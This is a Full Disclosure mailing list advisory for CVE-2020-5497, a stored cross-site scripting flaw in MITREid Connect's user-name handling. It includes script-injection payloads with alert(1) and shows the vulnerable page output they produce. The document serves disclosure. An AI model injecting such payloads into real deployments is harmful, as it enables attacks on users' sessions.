Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

CVE-2020-5497 - MITREid Connect XSS

From: aaron bishop <abishop () linux com>
Date: Fri, 21 Feb 2020 13:45:51 -0700
MITREid Connect OpenID-Connect-Java-Spring-Server
<https://github.com/mitreid-connect/OpenID-Connect-Java-Spring-Server> version
1.3.3 and earlier is vulnerable to Cross-Site Scripting; the users name is
included in *topbar.tag* and *header.tag* without being sanitized.  A user
can set their name to a value like:

Test</script><script>alert(1)</script>

Which will be included in JSON used by a JavaScript function in *header.tag*
:

// get the info of the current user, if available (null otherwise)

    function getUserInfo() {
        return {"sub":"12318767","name":"
*Test</script><script>alert(1)</script>*
Test","preferred_username":"Test","given_name":"Test</script><script>alert(1)</script>","family_name":"Test","email":"
test () test com","email_verified":true};}



A name such as:

Test<script>alert(1)</script>

would also work; it is included in the page when menus are created by
*topbar.tag*:

<!-- use a simplified user button system when collapsed -->

<ul class="nav hidden-desktop">
<li><a href="manage/#user/profile">*Test<script>alert(1)</script>*
Test</a></li>
<li class="divider"></li>
<li><a href="" class="logoutLink"><i class="icon-remove"></i> Log
out</a></li>



This issue has been reported on Github
<https://github.com/mitreid-connect/OpenID-Connect-Java-Spring-Server/issues/1521>
with
patches pending.

A write up is available at:
https://www.securitymetrics.com/blog/MITREid-Connect-cross-site-scripting-CVE-2020-5497

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Previous By Date Next
Previous By Thread Next

Current thread: